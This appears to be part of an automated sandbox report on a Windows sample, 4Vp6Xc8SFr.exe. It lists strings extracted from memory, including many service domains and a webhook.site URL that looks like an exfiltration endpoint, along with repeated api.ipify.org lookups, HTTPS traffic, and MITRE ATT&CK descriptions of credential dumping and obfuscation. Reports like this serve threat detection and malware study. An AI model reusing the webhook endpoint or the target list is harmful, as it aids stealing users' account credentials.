Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313292014.0000017AC97E6000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.311725138.0000017AC979F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313220480.0000017AC97A0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.265237287.0000017AC9A19000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.265290403.0000017AC97E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mahler:8092/site-updates.py
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://minecraft.net)
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://netflix.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://netflix.com))
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://origin.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://origin.com)z
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com)z&
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://paypal.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paypal.com)z
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://playstation.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://playstation.com)z
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pornhub.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pornhub.com)z
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.334748634.00007FFCFE052000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://python.org/dev/peps/pep-0263/
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.329841009.0000017ACA3DC000.00000004.00001000.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.321220717.0000017AC9759000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://requests.readthedocs.io
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://riotgames.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://riotgames.com)z
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://roblox.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://roblox.com)z
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sellix.io)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sellix.io)z
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spotify.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spotify.com)z
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steam.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.com)z
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://superfurrycdn.nl/copy/
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://telegram.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telegram.com)z
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tiktok.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiktok.com)z
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.315732154.0000017AC9B8B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.314533021.0000017AC9B88000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.312257969.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310364004.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316051174.0000017AC9B8D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316951723.0000017AC9B8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.315732154.0000017AC9B8B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.314533021.0000017AC9B88000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313746956.0000017AC9F82000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.312257969.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310364004.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9F94000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310101800.0000017AC9F7B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.315855580.0000017AC9B95000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316400323.0000017AC9FA9000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9F7F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.326576109.0000017AC9FC9000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313746956.0000017AC9F82000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9F94000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310101800.0000017AC9F7B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316400323.0000017AC9FA9000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316573052.0000017AC9FAA000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316400323.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9F7F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitch.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitch.com)z
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com)z
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.311013401.0000017AC75BB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317030830.0000017AC75E4000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.324813601.0000017AC9EFF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317461335.0000017AC9EFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://uber.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uber.com)z
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.324535554.0000017AC9DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.317388109.0000017AC9BA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.311013401.0000017AC75BB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.311842045.0000017AC762A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/html/sec-forms.html#multipart-form-data
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webhook.site/6ef9c344-b801-4707-b071-bfe96f5a7949
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309839320.0000017AC974D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.319732228.0000017AC9792000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310867870.0000017AC9774000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317656575.0000017AC9791000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.318423600.0000017AC9792000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://webhook.site/6ef9c344-b801-4707-b071-bfe96f5a7949Fc
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.258939168.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317531193.0000017AC9FCB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316400323.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.259054046.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.335503590.00007FFD0199B000.00000002.00000001.01000000.00000012.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.312093466.0000017AC974D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.309839320.0000017AC974D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.321220717.0000017AC9759000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.265237287.0000017AC9A19000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.265290403.0000017AC97E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.260918741.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.322585761.0000017AC9CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.263366632.0000017AC96F7000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.263484937.0000017AC9708000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.320632899.0000017AC8EE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.268784547.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269101774.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276315620.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276376619.0000017ACA0D0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269945464.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.275933215.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.270071852.0000017ACA0D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.314533021.0000017AC9B88000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.312257969.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310364004.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268784547.0000017ACA0F1000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276315620.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0F3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268919432.0000017ACA0F1000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276376619.0000017ACA0D0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.275933215.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.276315620.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276376619.0000017ACA0D0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.275933215.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/u
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xbox.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com)z
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com)
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com)z

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	DNS query: name: api.ipify.org

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

